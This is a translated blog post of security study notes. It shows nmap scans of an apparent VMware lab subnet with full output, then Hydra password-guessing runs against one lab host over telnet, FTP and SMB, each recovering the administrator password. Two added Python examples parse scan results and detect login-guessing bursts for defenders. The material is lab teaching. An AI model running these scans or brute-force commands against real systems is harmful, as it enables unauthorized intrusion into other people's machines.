Network security study notes: basic use of nmap and Hydra
Posted by 丢爸
Scanning techniques
Combine manual work with tools.
Host discovery: determine whether the target host is alive.
Common port numbers
| Port | Service | Port | Service |
|------|---------|------|---------|
| 21 | FTP | 22 | SSH |
| 23 | Telnet | 25 | SMTP |
| 80 | HTTP | 443 | HTTPS |
| 1433 | SQL Server | 1521 | Oracle |
| 3306 | MySQL | 3389 | Remote Desktop (RDP) |
Common nmap options

| Option | Meaning |
|--------|---------|
| -sP | ping scan (host discovery only) |
| -p | specify the port or port range to scan |
| -sV | service version detection |
| -O | enable operating system detection |
| -A | comprehensive (aggressive) scan |
| -oN | save normal output to a text file |
```
# Find which hosts on the 10.1.1.0 network are online
C:\Users\Administrator>nmap -sP 10.1.1.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-05 21:38 中国标准时间
Nmap scan report for 10.1.1.2
Host is up (0.00s latency).
MAC Address: 00:0C:29:F6:15:1A (VMware)
Nmap scan report for 10.1.1.5
Host is up (0.00039s latency).
MAC Address: 00:0C:29:5B:89:83 (VMware)
Nmap scan report for 10.1.1.100
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 7.89 seconds
```
```
# Enable OS detection and list the ports each host has open
C:\Users\Administrator>nmap -O 10.1.1.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-05 21:40 中国标准时间
Nmap scan report for 10.1.1.2
Host is up (0.00045s latency).
Not shown: 992 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
23/tcp   open  telnet
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1028/tcp open  unknown
1062/tcp open  veracity
3389/tcp open  ms-wbt-server
MAC Address: 00:0C:29:F6:15:1A (VMware)
Device type: general purpose
Running: Microsoft Windows 2003
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2
OS details: Microsoft Windows Server 2003 SP1 or SP2
Network Distance: 1 hop
Nmap scan report for 10.1.1.5
Host is up (0.00057s latency).
Not shown: 991 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
443/tcp   open  https
445/tcp   open  microsoft-ds
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
MAC Address: 00:0C:29:5B:89:83 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 7|8|Vista|2008
OS CPE: cpe:/o:microsoft:windows_7::-:professional cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2008::sp1
OS details: Microsoft Windows 7 Professional or Windows 8, Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7, Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008
Network Distance: 1 hop
Nmap scan report for 10.1.1.100
Host is up (0.00043s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
443/tcp  open  https
902/tcp  open  iss-realsecure
912/tcp  open  apex-mesh
1688/tcp open  nsjtp-data
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=12/5%OT=135%CT=1%CU=32317%PV=Y%DS=0%DC=L%G=Y%TM=61ACC1
OS:66%P=i686-pc-windows-windows)SEQ(SP=104%GCD=1%ISR=108%TI=I%CI=I%II=I%SS=
OS:S%TS=U)OPS(O1=MFFD7NW8NNS%O2=MFFD7NW8NNS%O3=MFFD7NW8%O4=MFFD7NW8NNS%O5=M
OS:FFD7NW8NNS%O6=MFFD7NNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF
OS:70)ECN(R=Y%DF=Y%T=40%W=FFFF%O=MFFD7NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=40%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=
OS:Y%T=40%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=O%F=R%O=%R
OS:D=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=
OS:0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U
OS:1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=Z%RUCK=G%RUD=G)IE(R=Y%DF
OS:I=N%T=40%CD=Z)
Network Distance: 0 hops
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (3 hosts up) scanned in 32.34 seconds
```
```
# Check whether a host has specific ports open
C:\Users\Administrator>nmap -p 21,23 10.1.1.2
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-05 21:45 中国标准时间
Nmap scan report for 10.1.1.2
Host is up (0.00076s latency).
PORT   STATE SERVICE
21/tcp open  ftp
23/tcp open  telnet
MAC Address: 00:0C:29:F6:15:1A (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds
```
```
# Identify service versions
C:\Users\Administrator>nmap -p 21,23 10.1.1.2 -sV
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-05 21:47 中国标准时间
Nmap scan report for 10.1.1.2
Host is up (0.00089s latency).
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
23/tcp open  telnet  Microsoft Windows XP telnetd
MAC Address: 00:0C:29:F6:15:1A (VMware)
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.56 seconds
```
```
# Comprehensive scan
C:\Users\Administrator>nmap -A 10.1.1.2
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-05 21:48 中国标准时间
Nmap scan report for 10.1.1.2
Host is up (0.00030s latency).
Not shown: 992 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
23/tcp   open  telnet        Microsoft Windows XP telnetd
| telnet-ntlm-info:
|   Target_Name: WIN2003-XDD1
|   NetBIOS_Domain_Name: WIN2003-XDD1
|   NetBIOS_Computer_Name: WIN2003-XDD1
|   DNS_Domain_Name: win2003-xdd1
|   DNS_Computer_Name: win2003-xdd1
|_  Product_Version: 5.2.3790
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows Server 2003 3790 Service Pack 2 microsoft-ds
1028/tcp open  msrpc         Microsoft Windows RPC
1062/tcp open  msrpc         Microsoft Windows RPC
3389/tcp open  ms-wbt-server Microsoft Terminal Service
MAC Address: 00:0C:29:F6:15:1A (VMware)
Device type: general purpose
Running: Microsoft Windows 2003
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2
OS details: Microsoft Windows Server 2003 SP1 or SP2
Network Distance: 1 hop
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp, cpe:/o:microsoft:windows_server_2003
Host script results:
|_nbstat: NetBIOS name: WIN2003-XDD1, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:f6:15:1a (VMware)
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows Server 2003 3790 Service Pack 2 (Windows Server 2003 5.2)
|   OS CPE: cpe:/o:microsoft:windows_server_2003::sp2
|   Computer name: win2003-xdd1
|   NetBIOS computer name: WIN2003-XDD1\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-12-05T21:49:02+08:00
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: -4h00m00s, deviation: 5h39m23s, median: -8h00m00s
TRACEROUTE
HOP RTT     ADDRESS
1   0.29 ms 10.1.1.2
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 91.85 seconds
```
```
# Save the scan results to the file a on drive D
C:\Users\Administrator>nmap -O 10.1.1.2 -oN d:\a
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-05 21:52 中国标准时间
Nmap scan report for 10.1.1.2
Host is up (0.0011s latency).
Not shown: 992 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
23/tcp   open  telnet
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1028/tcp open  unknown
1062/tcp open  veracity
3389/tcp open  ms-wbt-server
MAC Address: 00:0C:29:F6:15:1A (VMware)
Device type: general purpose
Running: Microsoft Windows 2003
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2
OS details: Microsoft Windows Server 2003 SP1 or SP2
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.64 seconds
```
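To turn scan output like the runs above into something a defender can act on, the following added example (not code from the original post) parses nmap's normal output format, the layout printed to the console and written by -oN, into per-host open-port lists and flags services whose logins cross the network in cleartext. The sample text and the set of cleartext services are constructed assumptions for this example.

```python
"""Parse nmap "normal" output (the format -oN writes and the console shows) into
per-host open-port lists and flag services that authenticate in cleartext."""
import re
from collections import defaultdict

# Constructed sample in the layout of the scan output shown in the post
# (values are made up for this example, not copied from a real scan).
SAMPLE = """\
Nmap scan report for 10.1.1.2
Host is up (0.0011s latency).
Not shown: 992 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
23/tcp   open  telnet
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
Nmap scan report for 10.1.1.5
Host is up (0.00057s latency).
PORT    STATE    SERVICE
80/tcp  open     http
443/tcp open     https
445/tcp filtered microsoft-ds
Nmap done: 2 IP addresses (2 hosts up) scanned in 2.64 seconds
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")

# Services whose login credentials cross the wire unencrypted; a weak password
# on these is exactly what a password-guessing tool recovers. (Assumed list.)
CLEARTEXT_AUTH = {"ftp", "telnet", "pop3", "imap"}

def parse_nmap_normal(text):
    """Return {host: [(port, proto, service), ...]} for ports whose STATE is 'open'."""
    hosts = defaultdict(list)
    current = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m.group(1)
            hosts[current]          # register the host even if nothing is open
            continue
        m = PORT_RE.match(line)
        if m and current and m.group(3) == "open":
            hosts[current].append((int(m.group(1)), m.group(2), m.group(4)))
    return dict(hosts)

def cleartext_exposure(hosts):
    """Return {host: [service, ...]} for hosts exposing cleartext-auth services."""
    found = {h: [svc for _, _, svc in ports if svc in CLEARTEXT_AUTH]
             for h, ports in hosts.items()}
    return {h: svcs for h, svcs in found.items() if svcs}
```

Feed it the file written by -oN (for example `parse_nmap_normal(open("a").read())`) to get the same dictionaries for a real scan.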
Hydra

```
# -l username: a single user name; -L FILE: a file of user names; -p password: a single password; -P FILE: a file of passwords
E:\SoftWare\thc-hydra-windows-master>hydra.exe -l administrator -P D:\pass.txt 10.1.1.2 telnet
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2021-12-05 22:10:18
[WARNING] telnet is by its nature unreliable to analyze, if possible better choose FTP, SSH, etc. if available
[DATA] max 6 tasks per 1 server, overall 64 tasks, 6 login tries (l:1/p:6), ~0 tries per task
[DATA] attacking service telnet on port 23
[23][telnet] host: 10.1.1.2   login: administrator   password: 123456
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2021-12-05 22:10:21
E:\SoftWare\thc-hydra-windows-master>hydra.exe -l administrator -P D:\pass.txt 10.1.1.2 ftp
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2021-12-05 22:11:26
[DATA] max 6 tasks per 1 server, overall 64 tasks, 6 login tries (l:1/p:6), ~0 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 10.1.1.2   login: administrator   password: 123456
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2021-12-05 22:11:26
```
```
# Port 445, SMB file sharing
E:\SoftWare\thc-hydra-windows-master>hydra.exe -l administrator -P D:\pass.txt 10.1.1.2 smb
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2021-12-05 22:15:35
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 64 tasks, 6 login tries (l:1/p:6), ~0 tries per task
[DATA] attacking service smb on port 445
[445][smb] host: 10.1.1.2   login: administrator   password: 123456
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2021-12-05 22:15:36
```
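Each Hydra run above finishes in a few seconds after a handful of tries against one account, which is the footprint a defender should look for in authentication logs. The following added example (not code from the original post) detects that footprint: a burst of failures for one account from one source, followed by a success. The log format and the sample lines are constructed for this example and do not correspond to any product's real log layout.

```python
"""Detect the login-guessing pattern a tool like Hydra leaves in authentication
logs: a burst of failures for one account from one source, often ending in a success."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log. The "date time service src user result" layout is an
# assumption for this example, not any product's real format. The first burst
# mirrors the post's telnet run: 6 tries in about 3 seconds, the last one valid.
SAMPLE_LOG = """\
2021-12-05 22:10:18 telnet 10.1.1.100 administrator FAIL
2021-12-05 22:10:18 telnet 10.1.1.100 administrator FAIL
2021-12-05 22:10:19 telnet 10.1.1.100 administrator FAIL
2021-12-05 22:10:19 telnet 10.1.1.7 backup FAIL
2021-12-05 22:10:20 telnet 10.1.1.100 administrator FAIL
2021-12-05 22:10:20 telnet 10.1.1.100 administrator FAIL
2021-12-05 22:10:21 telnet 10.1.1.100 administrator OK
2021-12-05 22:40:00 telnet 10.1.1.7 backup FAIL
"""

def parse(line):
    date, time, service, src, user, result = line.split()
    return datetime.fromisoformat(f"{date} {time}"), service, src, user, result

def detect_bursts(log_text, threshold=5, window=timedelta(seconds=30)):
    """Return [(src, user, service, failures, success_after_burst), ...].
    An alert fires once per (src, user) when `threshold` failures fall inside
    `window`; the flag turns True if a success follows while the burst is still
    inside the window, which is the signature of a guessed password."""
    recent = defaultdict(deque)      # (src, user) -> timestamps of recent failures
    alerts = {}                      # (src, user) -> mutable alert record
    for line in log_text.splitlines():
        ts, service, src, user, result = parse(line)
        key = (src, user)
        q = recent[key]
        while q and ts - q[0] > window:   # slide the window forward
            q.popleft()
        if result == "FAIL":
            q.append(ts)
            if len(q) >= threshold and key not in alerts:
                alerts[key] = [src, user, service, len(q), False]
        elif result == "OK" and key in alerts and len(q) >= threshold:
            alerts[key][4] = True
    return [tuple(a) for a in alerts.values()]

if __name__ == "__main__":
    for alert in detect_bursts(SAMPLE_LOG):
        print(alert)
```

The isolated `backup` failures half an hour apart never reach the threshold, so only the administrator burst is reported, with the success flag set.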